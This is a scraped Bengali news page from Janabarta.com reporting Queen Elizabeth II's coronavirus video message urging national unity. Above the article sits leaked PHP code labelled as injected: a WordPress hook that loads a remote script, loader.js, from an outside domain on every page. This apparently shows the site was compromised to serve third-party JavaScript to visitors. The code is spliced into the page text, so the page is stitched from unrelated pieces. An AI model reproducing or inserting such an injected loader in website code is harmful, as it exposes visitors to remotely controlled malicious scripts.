// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site সবাই একজোট থাকলে এ সংকট কাটিয়ে ওঠা সম্ভবঃ বৃটিশ রানী - Janabarta.com

সবাই একজোট থাকলে এ সংকট কাটিয়ে ওঠা সম্ভবঃ বৃটিশ রানী

জনবার্তা অনলাইনঃ করোনাভাইরাসের সংকট কাটিয়ে ওঠা সম্ভব যদি সবাই একজোট ও অটুট থাকে। এমনটা মনে করছেন ব্রিটেনের রানি দ্বিতীয় এলিজাবেথ। রোববার বিশেষ এক ভিডিও বার্তায় রানি এলিজাবেথ বলেন, ‘আমরা করোনাভাইরাসের এই সংকট জয় করতে পারব যদি আমরা সবাই একজোট থাকি এবং আমাদের মনোবল অটুট থাকে।’

ভিডিও বার্তায় রানি এলিজাবেথ করোনা মোকাবিলায় ব্রিটেনের নাগরিকদের জাতীয় চেতনার প্রশংসা করেন। সেসময় তিনি যুদ্ধের সময়ে প্রিয়জনদের ছেড়ে দূরে থাকার কষ্টের কথা সবাইকে মনে করার আহ্বান জানা। রানি প্রত্যাশার সুরে বলেন, ‘আমরা আবার মিলিত হব।’

এর আগে বিশ্ব অনেক সংকট মোকাবিলা করেছে এবং ভালোভাবে উতরেও গেছে। তবে এই সংকট অন্যগুলোর চেয়ে আলাদা বলে মনে করছেন রানি এলিজাবেথ। তিনি বলেন, ‘আমরা এর আগেও চ্যালেঞ্জের মুখোমুখি হয়েছি। তবে এটি সম্পূর্ণ আলাদা। এবার আমরা সবার চেষ্টায় বিশ্বের সব জাতির সঙ্গে এক হয়েছি।’ তিনি আশাবাদ ব্যক্ত করে বলেন, ‘আমরা সবাই মিলে সফল হবে। এই সফলতার দাবিদার হবেন সবাই।’